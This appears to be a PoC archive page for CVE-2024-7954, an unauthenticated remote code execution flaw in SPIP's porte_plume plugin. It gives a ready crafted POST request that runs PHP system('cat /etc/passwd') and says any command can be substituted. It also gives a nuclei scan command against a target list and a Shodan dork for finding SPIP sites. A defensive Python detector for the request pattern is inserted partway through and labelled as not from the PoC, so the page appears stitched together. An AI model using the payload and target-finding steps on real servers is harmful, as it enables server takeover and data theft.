PoC details: c3334eff89c8c07ff85477d4211705e13ccdb214

Source
Related vulnerability
Title: SPIP security vulnerability (CVE-2024-7954)
Description: SPIP is free, open-source software from the SPIP project for building Internet sites. SPIP contains a security vulnerability: it is susceptible to arbitrary code execution, and a remote, unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
Introduction
# RCE-CVE-2024-7954

## Description

The **porte_plume** plugin, utilized by SPIP versions prior to **4.30-alpha2**, **4.2.13**, and **4.1.16**, is susceptible to a critical **arbitrary code execution (RCE)** vulnerability. This flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by crafting a specific HTTP request. The potential for exploitation is severe, enabling attackers to run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.

### Vulnerability Details
- **Affected Software:** SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
- **Type of Vulnerability:** Remote Code Execution (RCE)
- **Severity Level:** Critical
- **Exploitability:** Remote and unauthenticated attackers can exploit this vulnerability.

## Exploit

## Nuclei Scan

```
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
```
An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:

```
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
```

### Explanation of the Exploit:
- The `POST` request is directed to the **porte_plume_previsu** action of SPIP's index.php file.
- The **data** parameter contains a payload that leverages PHP's `system()` function to execute a command (in this case, `cat /etc/passwd`), which reads the contents of the password file.
- By changing the command within the `system()` function, an attacker could execute any PHP code on the server, leading to severe consequences.
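From a defender's side, the request shape described above (a `porte_plume_previsu` action whose `data` parameter carries a PHP open tag) is easy to match in WAF exports or captured traffic. The following is an added detection example, not code from the PoC repository or from SPIP; it assumes raw HTTP/1.1 request text as input, and the sample requests, hostnames and payload bodies in it are constructed for the demonstration.

```python
"""Flag HTTP requests that match the CVE-2024-7954 porte_plume pattern.

Added detection example (not part of the PoC repository or of SPIP).
Input is assumed to be raw HTTP/1.1 request text, e.g. exported from a
WAF or reassembled from a packet capture.
"""
import re
from urllib.parse import parse_qs, urlsplit

# The SPIP action named in the advisory, and the PHP open tags ("<?php", "<?=")
# that have no business appearing in a preview request's data parameter.
TARGET_ACTION = "porte_plume_previsu"
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Constructed samples: a benign preview, two crafted requests, an unrelated hit.
SAMPLE_REQUESTS = [
    # Legitimate preview of harmless wiki-style text
    "POST /index.php?action=porte_plume_previsu HTTP/1.1\r\n"
    "Host: spip.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "data=Bonjour+*monde*",
    # Crafted request: PHP tag inside the [->URL] link markup (same shape as the PoC)
    "POST /index.php?action=porte_plume_previsu HTTP/1.1\r\n"
    "Host: spip.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "data=AA_[->URL<?php echo 1; ?>]_BB",
    # Same payload URL-encoded, with the action moved into the POST body
    "POST /index.php HTTP/1.1\r\n"
    "Host: spip.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=porte_plume_previsu&data=AA_%5B-%3EURL%3C%3Fphp+echo+1%3B+%3F%3E%5D_BB",
    # Unrelated request to the same site
    "GET /spip.php?page=sommaire HTTP/1.1\r\nHost: spip.example.test\r\n\r\n",
]


def parse_raw_request(raw):
    """Split a raw request into (method, path, params).

    Parameters from the query string and the form body are merged, so the
    action is found whether it travels in the URL or in the POST body.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = parse_qs(parts.query)
    for key, values in parse_qs(body).items():
        params.setdefault(key, []).extend(values)
    return method, parts.path, params


def classify(raw):
    """Return a finding string for a matching request, or None if it looks benign."""
    method, path, params = parse_raw_request(raw)
    if TARGET_ACTION not in params.get("action", []):
        return None
    for value in params.get("data", []):
        if PHP_TAG_RE.search(value):
            return f"{method} {path}: PHP open tag in {TARGET_ACTION} data"
    return None


def scan(requests):
    """Run classify() over a batch of raw requests and keep the findings."""
    return [finding for finding in map(classify, requests) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The match is deliberately narrow (action name plus a PHP open tag in `data`) so it can run on high-volume logs without flagging ordinary editor previews; pairing it with the version list from the advisory, so that only hosts still on a vulnerable SPIP release raise an alert, keeps the noise down further.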

## Shodan Dork

To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:

```
app="SPIP"
```

This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.
File snapshot

[4.0K] /data/pocs/c3334eff89c8c07ff85477d4211705e13ccdb214 └── [2.0K] README.md 0 directories, 1 file
Shenlong bot has cached this for you
Notes
    1. It is recommended to access the PoC through its source first.
    2. If the source has expired or cannot be reached, e-mail f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.